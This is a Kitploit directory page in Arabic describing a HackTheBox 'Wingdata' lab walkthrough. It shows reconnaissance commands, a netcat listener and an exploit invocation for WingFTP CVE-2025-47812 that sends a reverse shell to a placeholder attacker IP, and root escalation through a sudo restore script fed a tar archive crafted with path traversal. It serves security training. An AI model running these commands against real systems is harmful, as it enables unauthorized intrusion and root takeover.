Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wingdata — جولة HackTheBox Wingdata التي تغطي حقن الأوامر في WingFTP CVE-2025-47812 للوصول الأولي وتصعيد الصلاحيات عبر sudo باستخدام اجتياز مسار tar للوصول إلى root. | Kitploit
أدوات/GitHubGitHub/ledksv/wingdata
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubledksv/wingdata

wingdata

منذ 10س 51دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

جولة HackTheBox Wingdata التي تغطي حقن الأوامر في WingFTP CVE-2025-47812 للوصول الأولي وتصعيد الصلاحيات عبر sudo باستخدام اجتياز مسار tar للوصول إلى root.

عرض المستودع

Wingdata — جولة HackTheBox

المنصة: HackTheBox | نظام التشغيل: Linux

سلسلة الهجوم

يكشف تعداد VHost عن خادم WingFTP. يمنح حقن الأوامر CVE-2025-47812 وصولاً أولياً. الوصول إلى root عبر نص برمجي Python لاستعادة النسخ الاحتياطي يعمل بـ sudo ويستخرج أرشيف tar مُصمَّم — اجتياز مسار tar يكتب ملفاً عشوائياً بصلاحيات root.

التعداد

root@kitploit:~
nmap -sC -sV wingdata.htb -Pn

22/tcp open  ssh   OpenSSH
80/tcp open  http  wingdata.htb main site

تمت إضافة wingdata.htb إلى /etc/hosts. أشار المنفذ 80 إلى نطاق يدل على الاستضافة الافتراضية.

اكتشاف VHost

root@kitploit:~
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac

تم العثور على: ftp.wingdata.htb — واجهة الويب لخادم WingFTP.

CVE-2025-47812 — حقن الأوامر في WingFTP

CVE-2025-47812 هو ثغرة حقن أوامر في واجهة الويب لخادم WingFTP. تُسلِّم معلمة غير مُنقَّاة صدفة عكسية.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444

تم الحصول على صدفة. تم استرجاع علم المستخدم.

تصعيد الصلاحيات — اجتياز مسار Tar

root@kitploit:~
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py

يقبل /opt/restore.py أرشيف tar ويستخرجه بصلاحيات root. لا يقوم tar بتنقية المسارات — أرشيف مُصمَّم يحتوي على ../ في اسم الملف يكتب ملفات خارج دليل الاستخراج.

root@kitploit:~
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar

تم الحصول على صدفة root. علم root في /root/root.txt.


لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن صريح باختبارها.

تنزيل الأداة